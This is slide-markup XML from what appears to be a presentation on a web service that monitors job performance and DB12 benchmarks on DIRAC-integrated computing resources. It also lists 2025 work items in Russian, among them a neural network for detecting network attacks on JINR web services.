            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0F6FC6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537" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2925360" y="5792400"/>
            <a:ext cx="629244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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0055A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="Segoe UI"/>
              </a:rPr>
              <a:t>DB12 Benchmark of a core on which jobs was executed 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538" name="Прямая со стрелкой 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1934640" y="1072800"/>
            <a:ext cx="1080" cy="4492800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0F6FC6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539" name="TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729000" y="2739960"/>
            <a:ext cx="1218240" cy="82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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0055A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Job execution time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0055A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="Segoe UI"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0055A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="Segoe UI"/>
              </a:rPr>
              <a:t>sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0055A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="Segoe UI"/>
              </a:rPr>
              <a:t>)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0" name="TextBox 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9853920" y="4075920"/>
            <a:ext cx="1979640" cy="173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US" sz="1200" b="0" i="1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Arial"/>
              </a:rPr>
              <a:t>Igor Pelevanyuk, "Performance evaluation of computing resources with DIRAC interware", AIP Conference Proceedings 2377, 040006 (2021) https://doi.org/10.1063/5.0064778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41" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9833040" y="1073160"/>
            <a:ext cx="754200" cy="87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6067D62-A763-4D88-93D8-21CADBACBA5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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B6124C-7986-4E1F-9D78-B3854FDF1928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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FA546C-3B91-4E63-B2B3-CE1489B2E903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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47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23"/>
          <p:cNvSpPr/>
          <p:nvPr/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3" name="PlaceHolder 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316880" y="874800"/>
            <a:ext cx="9600120" cy="561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 defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>Architecture of the system</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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4" name="Google Shape;1341;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5799240" y="3689280"/>
            <a:ext cx="3555360" cy="17017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F6FC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200" b="0" i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data_collector.py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5" name="Google Shape;1342;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402720" y="3477960"/>
            <a:ext cx="1868400" cy="2124720"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="7CCA62">
                <a:lumMod val="75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CSV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546" name="Google Shape;1343;p2"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="547" idx="2"/>
            <a:endCxn id="544" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9354600" y="4540320"/>
            <a:ext cx="528120" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="548" name="Google Shape;1344;p2"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="544" idx="1"/>
            <a:endCxn id="545" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5271120" y="4540320"/>
            <a:ext cx="528480" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="549" name="Google Shape;1345;p2"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="545" idx="2"/>
            <a:endCxn id="550" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2874960" y="4540320"/>
            <a:ext cx="528120" cy="720"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="551" name="Группа 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9882360" y="3583800"/>
            <a:ext cx="1821240" cy="1913040"/>
            <a:chOff x="9882360" y="3583800"/>
            <a:chExt cx="1821240" cy="1913040"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="547" name="Google Shape;1340;p2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9882360" y="3583800"/>
              <a:ext cx="1821240" cy="1913040"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="0BD0D9">
                  <a:lumMod val="75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552" name="Google Shape;1347;p2"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10074960" y="4812480"/>
              <a:ext cx="1511640" cy="464040"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="553" name="Google Shape;1348;p2"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10311120" y="4127400"/>
              <a:ext cx="1038240" cy="719280"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;1341;p 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6542280" y="2028240"/>
            <a:ext cx="2069280" cy="120168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00">
                <a:lumMod val="50000"/>
                <a:lumOff val="50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CRON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555" name="Группа 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="631080" y="3407040"/>
            <a:ext cx="2243880" cy="2267280"/>
            <a:chOff x="631080" y="3407040"/>
            <a:chExt cx="2243880" cy="2267280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="550" name="Google Shape;1346;p2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="631080" y="3407040"/>
              <a:ext cx="2243880" cy="2267280"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="5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200" b="0" u="none" strike="noStrike">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                </a:rPr>
                <a:t>Web application</a:t>
              </a:r>
              <a:endPara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556" name="Picture 4" descr="Picture background"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1753200" y="5247000"/>
              <a:ext cx="1029600" cy="357840"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="557" name="Google Shape;1343;p 1"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="554" idx="2"/>
            <a:endCxn id="544" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7576920" y="3229920"/>
            <a:ext cx="360" cy="459720"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Дата 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AA86D63-4FD4-4CE0-BC1E-7AD09257886F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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E3E35E-4D80-450C-93AB-CBC5289988FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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25B19F-4F2E-4B9B-BB04-F796CAA482A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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48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Рисунок 22"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="0"/>
            <a:ext cx="11174760" cy="6288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62" name="Рисунок 24"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2304000" y="399960"/>
            <a:ext cx="9338400" cy="42796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63" name="Группа 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="507960" y="-7560"/>
            <a:ext cx="11174760" cy="6288480"/>
            <a:chOff x="507960" y="-7560"/>
            <a:chExt cx="11174760" cy="6288480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="564" name="Рисунок 26"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="507960" y="-7560"/>
              <a:ext cx="11174760" cy="62884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65" name="Рисунок 28"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2304000" y="392400"/>
              <a:ext cx="9338400" cy="42796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566" name="Прямоугольник 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354040" y="4997880"/>
            <a:ext cx="9228960" cy="1091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67" name="Прямоугольник 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2304000" y="392400"/>
            <a:ext cx="9440280" cy="424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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="568" name="Группа 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2354040" y="475560"/>
            <a:ext cx="9625680" cy="4417920"/>
            <a:chOff x="2354040" y="475560"/>
            <a:chExt cx="9625680" cy="4417920"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="569" name="Рисунок 30"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2354040" y="613800"/>
              <a:ext cx="9338400" cy="4279680"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="570" name="Группа 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2354040" y="475560"/>
              <a:ext cx="9625680" cy="4279680"/>
              <a:chOff x="2354040" y="475560"/>
              <a:chExt cx="9625680" cy="4279680"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="571" name="Прямоугольник: скругленные углы 2"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2354040" y="475560"/>
                <a:ext cx="9541800" cy="4279680"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 16667"/>
                </a:avLst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72" name="TextBox 3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10368720" y="2121120"/>
                <a:ext cx="1611000" cy="364680"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg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sz="1800" b="1" u="none" strike="noStrik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Scatter plot</a:t>
                </a:r>
                <a:endParaRPr lang="ru-RU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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="573" name="Группа 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2422080" y="5045760"/>
            <a:ext cx="9586800" cy="1384200"/>
            <a:chOff x="2422080" y="5045760"/>
            <a:chExt cx="9586800" cy="1384200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="574" name="Рисунок 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="15831" t="79548"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2422080" y="5144040"/>
              <a:ext cx="9405720" cy="1285920"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="575" name="Группа 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2467080" y="5045760"/>
              <a:ext cx="9541800" cy="1320120"/>
              <a:chOff x="2467080" y="5045760"/>
              <a:chExt cx="9541800" cy="1320120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="576" name="Прямоугольник: скругленные углы 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2467080" y="5149800"/>
                <a:ext cx="9541800" cy="1216080"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 16667"/>
                </a:avLst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77" name="TextBox 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10397880" y="5045760"/>
                <a:ext cx="1611000" cy="639000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg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sz="1800" b="1" u="none" strike="noStrik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Timeline chart</a:t>
                </a:r>
                <a:endParaRPr lang="ru-RU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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="578" name="Группа 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="344880" y="854280"/>
            <a:ext cx="3066840" cy="5913360"/>
            <a:chOff x="344880" y="854280"/>
            <a:chExt cx="3066840" cy="5913360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="579" name="Прямоугольник: скругленные углы 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="344880" y="854280"/>
              <a:ext cx="1958760" cy="591336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80" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1800720" y="4702680"/>
              <a:ext cx="1611000" cy="364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800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Filters</a:t>
              </a:r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581" name="Прямоугольник: скругленные углы 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705200" y="14760"/>
            <a:ext cx="1725120" cy="3848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61BF22-ACAF-4F74-86DD-742628982977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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CDC84E-A5BD-4607-BE48-814E62A6A1A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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DF9011-5531-40F6-9F03-A53DE98155F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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49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0" y="34920"/>
            <a:ext cx="12189960" cy="50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Выполненные работы за 2025 год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107640" y="666360"/>
            <a:ext cx="11806200" cy="5508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lnSpcReduction="9999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eriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Разработка и тестирование нейронной сети для обнаружения сетевых атак к веб-сервисам ОИЯИ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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Исследование методов агрегации векторных представлений текстов различных семантических пространств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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Работа над созданием алгоритма семантического поиска информации в базе данных цифровой карты компетенций по детекторным и ускорительным технологиям ОИЯИ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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Развитие веб-сервиса мониторинга производительности задач на ресурсах, интегрированных в распределенную инфраструктуру DIRAC</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt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D4B647-63FC-4D65-A4AB-2B7CABD12DAA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0D0FD684-B4C5-4412-965E-9B93E2FED344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4EF9FE1-A82A-45FD-BF7C-A68BB05FC86D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5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Рисунок 32"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="1941" b="1941"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="280020" y="284760"/>
            <a:ext cx="11631960" cy="62884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878" name="Группа 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2181240" y="284760"/>
            <a:ext cx="9645840" cy="3414600"/>
            <a:chOff x="2181240" y="51840"/>
            <a:chExt cx="9645840" cy="3414600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="879" name="Прямоугольник: скругленные углы 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2181240" y="51840"/>
              <a:ext cx="9645840" cy="303588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80" name="TextBox 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9466200" y="2827440"/>
              <a:ext cx="2004480" cy="63900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800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Jobs’ duration chart</a:t>
              </a:r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Группа 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1615774" y="799124"/>
            <a:ext cx="2597400" cy="2540160"/>
            <a:chOff x="1625400" y="1193760"/>
            <a:chExt cx="2597400" cy="2540160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="583" name="Подзаголовок 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2347200" y="3229200"/>
              <a:ext cx="1492200" cy="504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1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Color by site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584" name="Группа 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1625400" y="1193760"/>
              <a:ext cx="2597400" cy="2040120"/>
              <a:chOff x="1625400" y="1193760"/>
              <a:chExt cx="2597400" cy="2040120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="585" name="Прямая со стрелкой 6"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="2098080" y="1495080"/>
                <a:ext cx="360" cy="173916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</p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="586" name="Прямая со стрелкой 8"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2098080" y="3227040"/>
                <a:ext cx="1870560" cy="36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</p:cxnSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="587" name="Подзаголовок 20"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3621600" y="2890080"/>
                <a:ext cx="601200" cy="343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rmAutofit fontScale="92500" lnSpcReduction="9999"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601"/>
                  </a:spcBef>
                  <a:tabLst>
                    <a:tab pos="0" algn="l"/>
                  </a:tabLst>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="0" u="none" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="0055A0"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="Roboto Slab"/>
                  </a:rPr>
                  <a:t>DB12</a:t>
                </a:r>
                <a:endParaRPr lang="ru-RU" sz="14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88" name="Блок-схема: узел 19"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2365560" y="211896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89" name="Блок-схема: узел 20"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2476080" y="223164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0" name="Блок-схема: узел 21"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2605680" y="239256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1" name="Блок-схема: узел 22"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2346480" y="219564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2" name="Блок-схема: узел 23"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2430360" y="214992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3" name="Блок-схема: узел 24"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2411280" y="226980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4" name="Блок-схема: узел 25"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2541960" y="223164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5" name="Блок-схема: узел 26"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
